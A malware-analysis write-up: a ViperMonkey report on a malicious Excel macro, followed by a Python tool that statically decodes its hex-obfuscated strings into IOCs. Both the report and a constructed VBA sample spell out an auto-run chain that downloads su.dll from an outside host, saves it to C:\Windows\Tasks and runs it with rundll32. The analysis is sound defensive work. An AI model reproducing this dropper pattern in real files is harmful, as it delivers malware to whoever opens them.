| euvjhxge.Open | ['GET', 'hxxp://○○○/su.dll', False] | Interesting Function Call |
| Object.Method Call | ['GET', 'hxxp://○○○/su.dll', False] | euvjhxge.Open |
| GET | hxxp://○○○/su.dll | Interesting Function Call |
| CreateObject | ['ADODB.Stream'] | Interesting Function Call |
| tnukmirrugnryiyq.Ope | | Interesting Function Call |
| n | | |
| Object.Method Call | ['C:\\Windows\\Tasks\\su.dll', 2] | tnukmirrugnryiyq.SaveToFile |
| Write File | C:\Windows\Tasks\su.dll | SaveToFile |
| Dropped File Hash | 21eac00ec11c89e381668f3e36bb1b24e98f79a41c44f | File Name: ADODB.Stream |
| | 49b2b7689aa5bb222f1 | |
| Execute Command | rundll32 C:\Windows\Tasks\su.dll, PluginInit | Shell function |
+----------------------+-----------------------------------------------+---------------------------------+
Intermediate IOCs:
+---------------------------------------------------------+
hxxp://○○○/su.dll
+---------------------------------------------------------+
VBA Builtins Called: ['Chr', 'CreateObject', 'Len', 'Mid', 'Shell', 'Val']
Decoded Strings (11):
hxxp://○○○/su.
dll
C:\Wi
ndows\Tasks\su.dll
Mic
rosoft.XMLHTTP
GET
ADODB.
Stream
rundll32 C:\Windows\Tasks\su
.dll, PluginInit
Finished analyzing /root/sample.xls .
adding: root/sample.xls_artifacts/ (stored 0%)
adding: root/sample.xls_artifacts/ADODB.Stream (stored 0%)
[*] Dropped files are in sample.xls_artifacts.zip
[*] Done - Killing docker container c89da96207dbfe2f16469e979ca63ac3bc4a0efac4704526e89b2613570fd817
Note: part of the URL has been replaced.
The output is a report describing the commands that were executed, process and registry behaviour, network destinations, and so on.
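The report above also shows the macro's obfuscation trick: every string is stored as hex and rebuilt at run time by a helper that turns each pair of hex characters into one Chr$, with strings often split across two calls joined by "&". As an added example (not ViperMonkey's code), the Python below recovers those strings statically without running the macro: it finds the decoder by its Val("&H" ...) body, concatenates "&"-joined calls, rewrites the source with the literals, and sorts the results into paths, commands and URLs as IOCs. The VBA excerpt is constructed for the demo with the decoder renamed hx, and the URL it hides is a placeholder (example.invalid), not the sample's.

```python
"""Added example, not part of ViperMonkey: statically recover strings that a
VBA macro hides behind a hex decoder of the form Chr$(Val("&H" & Mid$(s, i, 2)))
and list the IOCs found in them."""
import re

# Constructed VBA excerpt modelled on the report above. The decoder is named
# "hx" here (assumption); the URL is a placeholder, not the sample's.
SAMPLE_VBA = r'''
Function hx(ByVal s As String) As String
    Dim i As Long
    For i = 1 To Len(s) Step 2
        hx = hx & Chr$(Val("&H" & Mid$(s, i, 2)))
    Next i
End Function

Sub Workbook_Open()
    Set req = CreateObject(hx("4d6963") & hx("726f736f66742e584d4c48545450"))
    dest = hx("433a5c5769") & hx("6e646f77735c5461736b735c73752e646c6c")
    req.Open hx("474554"), hx("687474703a2f2f6578616d706c652e696e76616c69642f73752e646c6c"), False
    Set st = CreateObject(hx("41444f44422e") & hx("53747265616d"))
    r = Shell(hx("72756e646c6c333220433a5c57696e646f77735c5461736b735c7375") & hx("2e646c6c2c20506c7567696e496e6974"))
End Sub
'''

# A String function definition; the body is checked for the hex-decoding idiom.
DECODER_DEF = re.compile(
    r"Function\s+(\w+)\s*\(.*?\)\s*As\s+String(.*?)End Function", re.S | re.I)


def vba_hex_decode(hex_str: str) -> str:
    """Python equivalent of the VBA loop: each pair of hex digits -> one Chr$."""
    return bytes.fromhex(hex_str).decode("latin-1")


def find_hex_decoders(vba: str):
    """Names of String functions whose body builds characters from Val("&H..")."""
    return [name for name, body in DECODER_DEF.findall(vba) if 'Val("&H"' in body]


def decode_strings(vba: str, decoder: str):
    """Replace each chain decoder("..") & decoder("..") with the decoded literal.
    Returns (rewritten source, decoded strings in source order)."""
    call = r"\b" + re.escape(decoder) + r'\("([0-9A-Fa-f]*)"\)'
    chain = re.compile(call + r"(?:\s*&\s*" + call + r")*")
    decoded = []

    def repl(m):
        # findall on the chain gives every hex argument, not just the last one
        s = "".join(vba_hex_decode(h) for h in re.findall(call, m.group(0)))
        decoded.append(s)
        return '"' + s.replace('"', '""') + '"'

    return chain.sub(repl, vba), decoded


IOC_PATTERNS = {
    "url": re.compile(r"\bhttps?://[^\s\"']+", re.I),
    "path": re.compile(r"\b[A-Za-z]:\\[^\s\"',]+"),
    "command": re.compile(
        r"\b(?:rundll32|regsvr32|mshta|wscript|cscript|powershell|cmd)\b.*", re.I),
}


def extract_iocs(strings):
    """Group decoded strings into simple IOC classes, de-duplicated, in order."""
    found = {kind: [] for kind in IOC_PATTERNS}
    for s in strings:
        for kind, pat in IOC_PATTERNS.items():
            for hit in pat.findall(s):
                if hit not in found[kind]:
                    found[kind].append(hit)
    return found


if __name__ == "__main__":
    for name in find_hex_decoders(SAMPLE_VBA):
        src, strings = decode_strings(SAMPLE_VBA, name)
        print(f"decoder: {name}")
        for s in strings:
            print("  ", s)
        print(extract_iocs(strings))
```

Feed the output of olevba into decode_strings with the decoder name find_hex_decoders reports; because nothing is executed, this also works on samples whose macro refuses to run outside Excel. The ViperMonkey report's "Decoded Strings" list contains the same fragments, only split at the "&" boundaries rather than joined.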